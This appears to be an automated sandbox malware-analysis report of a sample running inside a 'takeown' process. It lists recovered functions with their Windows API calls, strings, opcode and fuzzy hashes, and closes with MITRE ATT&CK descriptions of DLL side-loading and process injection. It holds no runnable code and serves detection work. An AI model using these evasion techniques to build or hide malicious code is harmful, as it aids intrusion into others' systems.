Opcode ID: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction ID: f0c2618715287c2ddcb37372ae8f33a859681e0c2b63b97d61a1769d4254fec9
Opcode Fuzzy Hash: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction Fuzzy Hash: 0701C4B9E1020AAFDB00DBA0DC82FDABB789F14618F0481E9DD089B181F671E759CB51

Uniqueness

Uniqueness Score: -1.00%

Function 032F40A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032F4112

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction ID: b363acc8731570035778e13b4bfba0576cd1873de3c88743b4ffb49daf508512
Opcode Fuzzy Hash: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction Fuzzy Hash: DD0152B9D0020EABDF10EBE1EC81FDEB3789B54608F0441A4EA089B281F671E758C751

Uniqueness

Uniqueness Score: -1.00%

Function 03308040 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(032F0B81,032F0BA9,032F0981,00000000,032F7993,00000010,032F0BA9,?,?,00000044,032F0BA9,00000010,032F7993,00000000,032F0981,032F0BA9), ref: 033080A0

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 871802d037cf03b1b75e86a374d2ab1772f5dafadbb207b0dbb7236ba7ea4e42
Instruction ID: b25bd32fd906cea93e1fe80879bb646c0cef194d597f7c2cfc4a665783b598fa
Opcode Fuzzy Hash: 871802d037cf03b1b75e86a374d2ab1772f5dafadbb207b0dbb7236ba7ea4e42
Instruction Fuzzy Hash: E601DDB6205608BBCB44DE89DC81EEB77ADEF8C714F408208FA09E7240D630F8518BB4

Uniqueness

Uniqueness Score: -1.00%

Function 032E9230 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 032E9275

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 791f8d8c3fcce41ebaad8a6ea7e2aff92c5f62a32c50d6d3d6326be9086c9953
Instruction ID: 67a4f71a5846288992b499b7993504ecc6ac342ea9b427733fc7dca046ebcf0a
Opcode Fuzzy Hash: 791f8d8c3fcce41ebaad8a6ea7e2aff92c5f62a32c50d6d3d6326be9086c9953
Instruction Fuzzy Hash: 7BF039777A030436E760A6A99C02FDBB28C8B80AA1F540426F70CEB2C0D9A5B88142A5

Uniqueness

Uniqueness Score: -1.00%

Function 03307F60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(032F12E9,?,03304AB7,032F12E9,033042E7,03304AB7,?,032F12E9,033042E7,00001000,?,?,033097ED), ref: 03307F9C

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction ID: 30779009002f2d87c4e252ebf37987e0f927fd9962b8ded04fa2376c1a3ac2ed
Opcode Fuzzy Hash: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction Fuzzy Hash: 3CE06D762003047BC610EE58DC45FAB77ACEF84750F004018F918AB281D6B0B91086B8

Uniqueness

Uniqueness Score: -1.00%

Function 03307FB0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,0007A086,00000007,00000000,00000004,00000000,032F3977,000000F4,?,?,?,?,?), ref: 03307FEF

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction ID: a4c1b03aad0927fedfd85bb423a2ebbdefa6c35ab160c8efeff65314110461e6
Opcode Fuzzy Hash: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction Fuzzy Hash: 76E092762107047BDB10EE59DC51F9B73ACEFC8750F004418F918AB240D6B0B91187B8

Uniqueness

Uniqueness Score: -1.00%

Function 032F79D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 032F79FC

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f0a5bd4e03653511d90ad7e61f4b975f3034743a01614326fa090b4a8e292b24
Instruction ID: 8fde22d66141e016ce714707487b04002a00b0f2302ab34bb81af11d9977032b
Opcode Fuzzy Hash: f0a5bd4e03653511d90ad7e61f4b975f3034743a01614326fa090b4a8e292b24
Instruction Fuzzy Hash: 2CE020311543041BE724F56CDC41F627348874CA64F1D0B70F91CCB1C1E579F6819150

Uniqueness

Uniqueness Score: -1.00%

Function 032F77D8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,032F15D0,03306A07,033042E7,?), ref: 032F7813

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8fa1b476f35eae32b4464f113ed3e77fe687cd0a4fa3c7878d6b3ca01f398b19
Instruction ID: e0f43b12835abbff0d7d688363bdd2c4bf6ac025c35703e7d65492e69b18c358
Opcode Fuzzy Hash: 8fa1b476f35eae32b4464f113ed3e77fe687cd0a4fa3c7878d6b3ca01f398b19
Instruction Fuzzy Hash: 10E07D76A64301BFF740D7A8EC02F6532489B50345F108574F54CDA3C1DE75B141CA10

Uniqueness

Uniqueness Score: -1.00%

Function 032F77E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,032F15D0,03306A07,033042E7,?), ref: 032F7813

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 57a7ed3940c5e854b0736bf77c4bb181d6d74a4e5ea863a2671015bb8ec5f508
Instruction ID: eb73d8462e940c37d5fe2d077d7d1080011cfa853069679bfd98ad5074ecb8d0
Opcode Fuzzy Hash: 57a7ed3940c5e854b0736bf77c4bb181d6d74a4e5ea863a2671015bb8ec5f508
Instruction Fuzzy Hash: 83D05E766903043BFA80E6A8DC02F56328C8B50654F448474BA4CEB3C2EEA5F15086A5

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2C24

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23a7462a3c11dab5263d595f4b9e27c3a913958b54593781189ab2356c8df6be
Instruction ID: a693467bb545a6dc418b272154aad5df0d2dcbbc6e62436c9b4e55a6c8c3dbc7
Opcode Fuzzy Hash: 23a7462a3c11dab5263d595f4b9e27c3a913958b54593781189ab2356c8df6be
Instruction Fuzzy Hash: 87B09B719015D5C9DE11F760460C7177918A7D1701F1AC577E3430641E473DC5D1E175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 032EDD18 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e051b04626f11176fed0e390637dd523c9489236df4f36d9d7942b297ae9b5b2
Instruction ID: bda216a615287f7f2535f2a8b3adb1439f4dbdb03e075883dd02fe96ea80604a
Opcode Fuzzy Hash: e051b04626f11176fed0e390637dd523c9489236df4f36d9d7942b297ae9b5b2
Instruction Fuzzy Hash: 53C0123360514009CB159D9DB4C17B0FB64D797225F0132DBD8589F15BD0A594524294

Uniqueness

Uniqueness Score: -1.00%

Function 032F1FFB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992f5bab1fdb3eb226e05f8475be7c575d1e12b2bfcfb54722e0a3ad5ce56d2f
Instruction ID: f4139c0273098c2c8ed9a18bad759f7b7cd7a6f0456cf359016bb0595f8077c2
Opcode Fuzzy Hash: 992f5bab1fdb3eb226e05f8475be7c575d1e12b2bfcfb54722e0a3ad5ce56d2f
Instruction Fuzzy Hash: 6FA0015BF5A0182244285D8ABC428B6F7A8D1971B6D5033ABEE0CB35006403C42501EE

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03AE293C
___swprintf_l.LIBCMT ref: 03AE295E
___swprintf_l.LIBCMT ref: 03AE29A3
___swprintf_l.LIBCMT ref: 03B1A52E

Strings

:%u.%u.%u.%u, xrefs: 03B1A5B8
ffff:, xrefs: 03B1A504
::ffff:0:%u.%u.%u.%u, xrefs: 03B1A54E
::%hs%u.%u.%u.%u, xrefs: 03B1A527

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 958cb705ace63803d88a274362acddc12861f0ab2278f25996e5df55191f850c
Instruction ID: 967fe58da64a3caea325e5b207108c0f74e7089d69421f78dda103e3a5ec93de
Opcode Fuzzy Hash: 958cb705ace63803d88a274362acddc12861f0ab2278f25996e5df55191f850c
Instruction Fuzzy Hash: 5F51D7B6A04216BFCB10EB9C8D90A7EF7BCBB09304B54856BE465D7645D334EE50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03B52410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03B524A6
___swprintf_l.LIBCMT ref: 03B524E2
___swprintf_l.LIBCMT ref: 03B5257D
___swprintf_l.LIBCMT ref: 03B525A3
___swprintf_l.LIBCMT ref: 03B525C8
___swprintf_l.LIBCMT ref: 03B52608

Strings

ffff:, xrefs: 03B5247D, 03B5249D
::%hs%u.%u.%u.%u, xrefs: 03B5249E
:%u.%u.%u.%u, xrefs: 03B525FF
::ffff:0:%u.%u.%u.%u, xrefs: 03B524DA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 0e8d9f7b65104129f0ccc376d636f294345b0217cb1a6ced343d77bff4936115
Instruction ID: 103a22734144f390d8e73579df345910db1164a5a126339d6df075b8e42c9681
Opcode Fuzzy Hash: 0e8d9f7b65104129f0ccc376d636f294345b0217cb1a6ced343d77bff4936115
Instruction Fuzzy Hash: 85510875A006456EDF20DF9CCD90A7EB7F9EB48205B0488EAF996DB641D7B4DA008760

Uniqueness

Uniqueness Score: -1.00%

Function 03AD7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03B14655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03B14725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03B146FC
ExecuteOptions, xrefs: 03B146A0
Execute=1, xrefs: 03B14713
CLIENT(ntdll): Processing section info %ws..., xrefs: 03B14787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03B14742

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 5e5ac53d719deb41203e3483789bdb01b57e56127500f5ee0f554ad9843f2bd2
Instruction ID: 79ac25bc1c8c9515a0ca10596cfb5da5d78a976b18a5e05437b564c9c91bde36
Opcode Fuzzy Hash: 5e5ac53d719deb41203e3483789bdb01b57e56127500f5ee0f554ad9843f2bd2
Instruction Fuzzy Hash: 6D513635A003187ADF14EFA9DD85FBE77B8EF09304F0404EBE506AB281E7729A418B50

Uniqueness

Uniqueness Score: -1.00%

Function 03AEB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03AEB6BF

Strings

-, xrefs: 03AEB650
+, xrefs: 03AEB65A
0, xrefs: 03AEB695
0, xrefs: 03AEB66F

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: d943c73056d2569eeba0eb1003504f9a3ddc38494e74b634bbdd5472613ffbf5
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: A2818F74E0A2499EDF24CF68C8597AEBBB6AF46310F1C455FD861A7790C63498408B70

Uniqueness

Uniqueness Score: -1.00%

Function 03B520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03B5214F
___swprintf_l.LIBCMT ref: 03B52172

Strings

]:%u, xrefs: 03B52169
%%%u, xrefs: 03B52146
[, xrefs: 03B5212B

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 53b26a68c1ba8f221d0848b596a6d06f1d92964beb3ae2490bededd9f8bd711a
Instruction ID: 14cf5c2e06ce542ff6e8d810cf85823250db08daa7963b70e88847343fc60d30
Opcode Fuzzy Hash: 53b26a68c1ba8f221d0848b596a6d06f1d92964beb3ae2490bededd9f8bd711a
Instruction Fuzzy Hash: FC214F7AA01219ABDB10DE69DD40BAFB7FCEF58644F080566FD05EB241E730DA018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03ACF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03B102BD
RTL: Re-Waiting, xrefs: 03B1031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03B102E7

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: d8eebefa11fd1a94b17a87345f4054256f36f85c50f3ed24c15b537abae88a69
Instruction ID: 94f51d1ff2410d652cb09accafc0e7101b27b78ff8998c21b91c062c2442bea1
Opcode Fuzzy Hash: d8eebefa11fd1a94b17a87345f4054256f36f85c50f3ed24c15b537abae88a69
Instruction Fuzzy Hash: 7BE1DF30614781DFD725DF28C984B2AB7E1FB89318F180AAEF4A58B2E1D774D954CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03ADBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03B17B7F
RTL: Resource at %p, xrefs: 03B17B8E
RTL: Re-Waiting, xrefs: 03B17BAC

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 94d1b44886a3d45062fe835bc624eacf903ca9de8da13995a67fb04e4cee00b6
Instruction ID: 4d83f4f8a1c76b6b5c6fafe1e02b0ce9f23b066f0ccb059eb918ec7bcd104390
Opcode Fuzzy Hash: 94d1b44886a3d45062fe835bc624eacf903ca9de8da13995a67fb04e4cee00b6
Instruction Fuzzy Hash: AE41E1357007029FCB24DF29C851B6BB7E5EF89724F140A6EF95A9B280DB31E4058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03ADB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03B1728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03B17294
RTL: Resource at %p, xrefs: 03B172A3
RTL: Re-Waiting, xrefs: 03B172C1

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: f22720aff111111c2930dcdd26b30d0c8df0d4f2e6fd8c80f162136b9ce4bc89
Instruction ID: 960eccb81045626dc2bc69748bd3db092b8366820d3bdabe2f6ddf3384feeb1a
Opcode Fuzzy Hash: f22720aff111111c2930dcdd26b30d0c8df0d4f2e6fd8c80f162136b9ce4bc89
Instruction Fuzzy Hash: 1041F275B00206ABCB20DF24CC42F6AF7A5FF56718F24066AF856DB240DB21E81287E0

Uniqueness

Uniqueness Score: -1.00%

Function 03B52300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03B5238D
___swprintf_l.LIBCMT ref: 03B523B3

Strings

%%%u, xrefs: 03B52384
]:%u, xrefs: 03B523AA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d9e933347e4f3df404ef00c8982ace9af3e84aac09ff381089d5e4c1c1093d2e
Instruction ID: ad8eb48d463ec5903ec5ef9026e68e9387f919d9bffae8d43b51c0dba4e7a984
Opcode Fuzzy Hash: d9e933347e4f3df404ef00c8982ace9af3e84aac09ff381089d5e4c1c1093d2e
Instruction Fuzzy Hash: 48316876A012199FDB20DF29DD40BEEB7F8EB54614F4445E6FC49E7240EB309A498B60

Uniqueness

Uniqueness Score: -1.00%

Function 03AE7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03AE7E8B

Strings

+, xrefs: 03AE7DE8
-, xrefs: 03AE7DDD

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: f7d5222fedc429303d64867b475e16c23caef8855c75f3de841bfd077e8c2cc2
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 42918F70E0021A9EDB24DF69C891ABEB7B5EF44721F58461FE865E72C0E7369940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03AA9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 03AA9191
@, xrefs: 03AA9175

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: cee0985f70cc9cec4929e77c70b4fb87921808722645c9ba88b91ecc495046ec
Instruction ID: 0a4c110841a52d31970d7d4cc65eed0031c7e7e8a5a57577b85624341bfb653b
Opcode Fuzzy Hash: cee0985f70cc9cec4929e77c70b4fb87921808722645c9ba88b91ecc495046ec
Instruction Fuzzy Hash: D6813D76D002699BDB65CF54CD44BEEBBB8AB08714F0445EBA909BB280D7309E84CF60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
